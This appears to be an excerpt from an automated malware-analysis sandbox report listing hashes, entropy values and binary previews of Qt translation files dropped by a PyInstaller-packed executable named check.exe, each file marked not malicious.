SHA1:	8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
SHA-256:	9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
SHA-512:	D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.631479835393124
Encrypted:	false
SSDEEP:	3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
MD5:	6FBA66FE449866B478A2EBA66A724A02
SHA1:	EBEF6ED8460218CE8DF735659A8CBCD693600AC6
SHA-256:	171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
SHA-512:	2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7483537099309427
Encrypted:	false
SSDEEP:	3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
MD5:	D033053C03C3ECFA2AA926E0E674F67F
SHA1:	B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
SHA-256:	3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
SHA-512:	2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
MD5:	E6A683F4A0883B5B0C7D30B847EF208C
SHA1:	FF2440DBBFE04AD86C6F285426AAFD49A895B128
SHA-256:	B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
SHA-512:	D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
MD5:	06168E1261BF72F49F94927723B2E1EB
SHA1:	DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
SHA-256:	5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
SHA-512:	AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
